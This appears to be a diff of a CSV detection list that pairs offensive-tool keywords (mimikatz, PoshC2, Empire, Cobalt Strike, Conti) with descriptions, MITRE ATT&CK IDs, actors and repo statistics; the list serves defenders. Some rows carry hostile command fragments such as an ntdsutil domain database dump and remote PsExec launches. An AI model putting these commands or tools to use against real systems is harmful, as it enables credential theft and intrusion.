T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::sleep*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::version*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standin --asrep*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --dc*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --delegation*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --group *Domain Admins*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --object *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --spn*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*StarFighters*","offensive_tool_keyword","StarFighters","A JavaScript and VBScript Based Empire Launcher - by Cn33liz 2017","T1059 - T1055 - T1218 - T1027","TA0002 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/StarFighters","1","0","N/A","N/A","4","320","66","2017-06-05T19:18:38Z","2017-06-05T18:28:22Z" "*Starkiller*","offensive_tool_keyword","Starkiller","Starkiller is a Frontend for Powershell Empire. It is an Electron application written in VueJS. If you'd like to contribute please follow the Contribution guide. If you'd like to request a feature or report a bug. please follow the Issue template.","T1105 - T1210 - T1059 - T1027 - T1035","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","C2","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","10","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" "*StarkillerSnackbar.vue*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" -"*staroffice2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*staroffice2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Start Menu\Programs\Startup\Loader.exe*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*start PsExec.exe -d *","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*start stinger ","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","0","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*start_mythic_server.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*start_nbnsspoof*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*start_mythic_server.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*start_nbnsspoof*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*Start-ACLsAnalysis -Domain*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" -"*startanotherimplant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Start-CaptureServer.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*startdaisy*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*startanotherimplant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Start-CaptureServer.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*startdaisy*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Start-domainACLsAnalysis*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*starting Multi-Layered ACLight scan*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*-start-keylogger*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" -"*start-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*start-keystrokes-writefile*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Start-MonitorTCPConnections.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1144","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*start-process ntdsutil.exe *create full**","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*start-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*start-keystrokes-writefile*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Start-MonitorTCPConnections.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1144","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*start-process ntdsutil.exe *create full**","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*StartProcessFake(*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*Start-PSAmsiClient.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" 